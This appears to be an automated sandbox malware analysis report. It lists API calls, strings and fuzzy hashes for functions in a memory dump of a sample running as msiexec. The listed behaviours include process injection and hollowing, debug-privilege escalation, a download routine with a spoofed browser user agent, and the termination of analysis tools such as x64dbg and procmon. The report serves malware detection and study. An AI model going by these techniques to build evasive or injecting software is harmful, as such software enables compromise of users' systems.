Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: DebuggerPresent$CheckCurrentProcessRemote
String ID:
API String ID: 3920101602-0
Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction ID: 62877dd75fb5eb1a43bb801d5f7737b99a0ef3b354f43a0726d1ac625d51a796
Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction Fuzzy Hash: 8DF05E24D0CA83C1E7306B65F44C379E790AF45B5AF844174DA8D06596EF6CE50EDB31

Function 00007FF7179D43A4 Relevance: 4.5, APIs: 3, Instructions: 21
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNELBASE ref: 00007FF7179D43B9
GetLastError.KERNEL32 ref: 00007FF7179D43D0
CloseHandle.KERNEL32 ref: 00007FF7179D43E2

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
Instruction ID: dbf82d95988f56a7e9bc69d80ff5fc3aa2cce2c80a9ed5ac400ae00080ae8204
Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
Instruction Fuzzy Hash: DCF0302590CE83C2EB207B20E5893BDE360FB95754FD00535DD8E42666CF6DD40E9720

Function 00007FF7179D1050 Relevance: 3.0, APIs: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00007FF7179D1063
GetProcAddress.KERNEL32 ref: 00007FF7179D1078

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction ID: 069b46a2b803c6a3c734011570ca0705d35c50ef87aed3ba200aa6c77e12dc32
Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction Fuzzy Hash: D9E09276508F8186C620AB15F88401EB7B4FBC8794F904125EACD42B28DF3CC169CB00

Function 00007FF7179D3B24 Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE ref: 00007FF7179D3B42

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction ID: 365907d3356a28463c32b368ace4ff7b8ce05e6755b8cd7f0c21cc2cb67e7c01
Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction Fuzzy Hash: 7DD0C921E38D82D1E794AB26E889729A2A0FBC4B45F808135E68941565CE3CC09E8B00

Non-executed Functions

Function 00007FF7179D2048 Relevance: 63.4, APIs: 32, Strings: 4, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7179D20AD

Strings

@, xrefs: 00007FF7179D2429
.reloc, xrefs: 00007FF7179D264F
NtUnmapViewOfSection, xrefs: 00007FF7179D23AE
ntdll, xrefs: 00007FF7179D2399

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: FileModuleName
String ID: .reloc$@$NtUnmapViewOfSection$ntdll
API String ID: 514040917-3001742581
Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction ID: 84c1f5bfe8c752708116ce3524f9e2f5f0110caa14c9c5639ead3a28f315b418
Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction Fuzzy Hash: AE32DC3260CBC286D774DB15E8987AAB3A1F7C8BA5F404135DA8D83B59DF7CD4498B10

Function 00007FF7179D40E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7179D414B
OpenProcessToken.ADVAPI32 ref: 00007FF7179D415E
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7179D4186
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7179D41B1
CloseHandle.KERNEL32 ref: 00007FF7179D41BC
OpenProcess.KERNEL32 ref: 00007FF7179D41D1
WaitForSingleObject.KERNEL32 ref: 00007FF7179D422C
CloseHandle.KERNEL32 ref: 00007FF7179D4249

Strings

SeDebugPrivilege, xrefs: 00007FF7179D417D

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
String ID: SeDebugPrivilege
API String ID: 2379135442-2896544425
Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction ID: 6055a92524635dab32482a8e28672e73c1aa1d261a18bbef9e090ae157b38ff8
Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction Fuzzy Hash: FE416A32618A8286E350DB51F48836EF7A0FB807A4F904134EA8947AA9DFBDD44DCF10

Function 00007FF7179D2CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32 ref: 00007FF7179D2D6F
WriteProcessMemory.KERNEL32 ref: 00007FF7179D2DC1
VirtualProtectEx.KERNEL32 ref: 00007FF7179D2DF7

Strings

@, xrefs: 00007FF7179D2D54

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: Virtual$AllocMemoryProcessProtectWrite
String ID: @
API String ID: 4073123320-2766056989
Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction ID: 23ed6c52531b8770c9a8e885532bea41c66a11da3f0b1b5e57a0cf8de79caf0b
Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction Fuzzy Hash: 0F41F23260CB8686E770DB15F49836AF7A0F789BA4F504025EACC83B59DF7DD4498B50

Function 00007FF7179D1CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138
networksleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET ref: 00007FF7179D1D20
Sleep.KERNEL32 ref: 00007FF7179D1D38
InternetOpenUrlW.WININET ref: 00007FF7179D1D64
InternetOpenUrlW.WININET ref: 00007FF7179D1D9B
InternetCloseHandle.WININET ref: 00007FF7179D1DB3
Sleep.KERNEL32 ref: 00007FF7179D1DBE
HttpQueryInfoA.WININET ref: 00007FF7179D1DEE
InternetCloseHandle.WININET ref: 00007FF7179D1DFD
InternetCloseHandle.WININET ref: 00007FF7179D1E08
Sleep.KERNEL32 ref: 00007FF7179D1E13
InternetCloseHandle.WININET ref: 00007FF7179D1E2D
InternetOpenUrlW.WININET ref: 00007FF7179D1E57
InternetCloseHandle.WININET ref: 00007FF7179D1E6F
Sleep.KERNEL32 ref: 00007FF7179D1E7A
HttpQueryInfoA.WININET ref: 00007FF7179D1EB2
GetProcessHeap.KERNEL32 ref: 00007FF7179D1EC1
RtlAllocateHeap.NTDLL ref: 00007FF7179D1ED7
InternetCloseHandle.WININET ref: 00007FF7179D1EEF
InternetCloseHandle.WININET ref: 00007FF7179D1EFA
InternetReadFile.WININET ref: 00007FF7179D1F37
InternetCloseHandle.WININET ref: 00007FF7179D1F6D
InternetCloseHandle.WININET ref: 00007FF7179D1F78

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7179D1D19

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
API String ID: 2307068205-2771526726
Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction ID: 5743e3d696b70e7467e1b1665e0b4d7271ddf9f5c80587afdff0b8da5bc9e4c2
Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction Fuzzy Hash: A771F676618A8282E750EB54F49836EF7A0FBC47A4F901135FA8E43A69CF7CD44D8B10

Function 00007FF7179D46E4 Relevance: 24.2, APIs: 16, Instructions: 155
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileSize.KERNEL32 ref: 00007FF7179D474C
GetProcessHeap.KERNEL32 ref: 00007FF7179D4762
RtlAllocateHeap.NTDLL ref: 00007FF7179D477B
CloseHandle.KERNEL32 ref: 00007FF7179D4793

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: Heap$AllocateCloseFileHandleProcessSize
String ID:
API String ID: 1391523307-0
Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction ID: 05695ffc522ee71a45d2b02f721e33c543f1d90d1fb13df5d6cc104e99077a0f
Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction Fuzzy Hash: 2281BD36608F8286EA50DB56F48436EE7A0FBC9BA1F504535EA8D83769DF7CD0498B10

Function 00007FF7179D30DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7179D45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3117), ref: 00007FF7179D4654

Part of subcall function 00007FF7179D3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7179D3C3C

Part of subcall function 00007FF7179D3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7179D3E37

Part of subcall function 00007FF7179D3E24: Process32FirstW.KERNEL32 ref: 00007FF7179D3E6A
Part of subcall function 00007FF7179D3E24: CloseHandle.KERNEL32 ref: 00007FF7179D3E7C

Part of subcall function 00007FF7179D3E24: wcscmp.MSVCRT ref: 00007FF7179D3E91
Part of subcall function 00007FF7179D3E24: OpenProcess.KERNEL32 ref: 00007FF7179D3EA7
Part of subcall function 00007FF7179D3E24: TerminateProcess.KERNEL32 ref: 00007FF7179D3ECA
Part of subcall function 00007FF7179D3E24: CloseHandle.KERNEL32 ref: 00007FF7179D3ED8
Part of subcall function 00007FF7179D3E24: Process32NextW.KERNEL32 ref: 00007FF7179D3EEB
Part of subcall function 00007FF7179D3E24: CloseHandle.KERNEL32 ref: 00007FF7179D3EFD

Sleep.KERNEL32 ref: 00007FF7179D31C6

Strings

procexp.exe, xrefs: 00007FF7179D314E
ProcessHacker.exe, xrefs: 00007FF7179D3142
x64dbg.exe, xrefs: 00007FF7179D3172
Services, xrefs: 00007FF7179D31B5
TOTALCMD.exe, xrefs: 00007FF7179D3166
idaq.exe, xrefs: 00007FF7179D318A
idaq64.exe, xrefs: 00007FF7179D317E
autoruns.exe, xrefs: 00007FF7179D3196
procmon.exe, xrefs: 00007FF7179D31A2
procexp64.exe, xrefs: 00007FF7179D315A

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
API String ID: 4011447834-928700279
Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction ID: 71538bb510e44a0e941b4f024f392962346737fa5a14ade19f1ba244ae1e7077
Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction Fuzzy Hash: 38218024A18D4391EA04FB65E8DD1B8E2A1AF957B5FC04231E41D422E7DE6CE90F8670

Function 00007FF7179D2E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32 ref: 00007FF7179D2E85
ReleaseMutex.KERNEL32 ref: 00007FF7179D2E9D
CloseHandle.KERNEL32 ref: 00007FF7179D2EA8
GetLastError.KERNEL32 ref: 00007FF7179D2EB5
ReleaseMutex.KERNEL32 ref: 00007FF7179D2EC7
CloseHandle.KERNEL32 ref: 00007FF7179D2ED2

Strings

rbNSpGEsyb, xrefs: 00007FF7179D2E70

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID: rbNSpGEsyb
API String ID: 299056699-189039185
Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction ID: dbfec0dbbac1783c563a2c7c41f1b8a1b04dd1fa50a59102131ecd554257da7b
Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction Fuzzy Hash: 9F017D2690CE4382E724AB11F89826DE760FB9CBB9F840531D94E42665CF7CD58E8620

Function 00007FF7179D38C4 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7179D3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7179D3784
Part of subcall function 00007FF7179D3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7179D3801
Part of subcall function 00007FF7179D3744: wsprintfW.USER32 ref: 00007FF7179D38A2

SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D390D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3922
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3935
CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3945
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D396D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3980
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3995

Strings

.exe, xrefs: 00007FF7179D3986

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
String ID: .exe
API String ID: 943468954-4119554291
Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
Instruction ID: d38a78bf61eb53d0078a6985e38b4bf526e3c3ce2f5b91d2f4b215360bab7f47
Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
Instruction Fuzzy Hash: 43111F21628DC796DB60AB25F89876EE361FBC4B90F805031DA4E43A2ADE7CD40EC750

Function 00007FF7179D3E24 Relevance: 13.5, APIs: 9, Instructions: 44
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7179D3E37
Process32FirstW.KERNEL32 ref: 00007FF7179D3E6A
CloseHandle.KERNEL32 ref: 00007FF7179D3E7C

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction ID: 71c836599dd00616232082b02abfd8766400cfbbbc4eb33f1114d6730a46c0c1
Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction Fuzzy Hash: 6C21AA31A0CDC782E770AB15F88C36AE260FBC4765F804235D55E425A9DF6DD44ECB20

Function 00007FF7179D2F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF7179D2F1E
ReleaseMutex.KERNEL32 ref: 00007FF7179D2F36
CloseHandle.KERNEL32 ref: 00007FF7179D2F41
GetLastError.KERNEL32 ref: 00007FF7179D2F4E
ReleaseMutex.KERNEL32 ref: 00007FF7179D2F60
CloseHandle.KERNEL32 ref: 00007FF7179D2F6B

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID:
API String ID: 299056699-0
Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction ID: ea7bdfc94c18b19bfddeb21a53921d41fd5dddc0644830ccca2c45afbd5cbe79
Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction Fuzzy Hash: 2401DE2691CE8382E720AB21F88C26DE370FBD8B69FC00535E98E43675CF6CD54E8610

Function 00007FF7179D3CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7179D3D01
PathFindFileNameW.SHLWAPI ref: 00007FF7179D3D14
wcslen.MSVCRT ref: 00007FF7179D3D2A
wcsncpy.MSVCRT ref: 00007FF7179D3DEF

Strings

Unknown, xrefs: 00007FF7179D3DE0

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: FileName$FindModulePathwcslenwcsncpy
String ID: Unknown
API String ID: 4220601557-1654365787
Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
